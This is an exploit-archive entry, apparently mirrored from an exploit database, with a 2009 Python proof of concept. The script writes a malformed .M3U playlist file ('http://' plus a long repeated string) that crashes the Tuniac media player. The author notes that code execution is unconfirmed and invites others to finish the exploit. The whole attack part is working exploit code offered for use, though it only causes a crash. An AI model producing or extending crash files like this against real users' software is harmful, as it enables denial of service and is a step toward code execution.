[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Tuniac v.090517c (.M3U File) Local File Crash PoC
# Published : 2009-08-05
# Author : Dr_IDE
# Previous Title : Linux Kernel < 2.6.14.6 procfs Kernel Memory Disclosure Exploit
# Next Title : jetAudio v 7.1.9.4030 plus vx (.m3u ) Local Stack Overflow (SEH)
#!/usr/bin/env python
##############################################################################################
#
# Tuniac v.090517c (.M3U) Crash PoC
# Found By: Dr_IDE
# http://sourceforge.net/projects/tuniac/files/tuniac/090517/Tuniac_Setup_090517c.exe/download
# Notes: Not sure if code execution is possible though. Maybe someone else can finish it off.
#
##############################################################################################
# Play around here, anything seems to knock it out.
buffer = ("http://" + "x41" * (4444));
f = open('Dr_IDE.M3U','w');
f.write(buffer);
f.close();
# www.Syue.com [2009-08-05]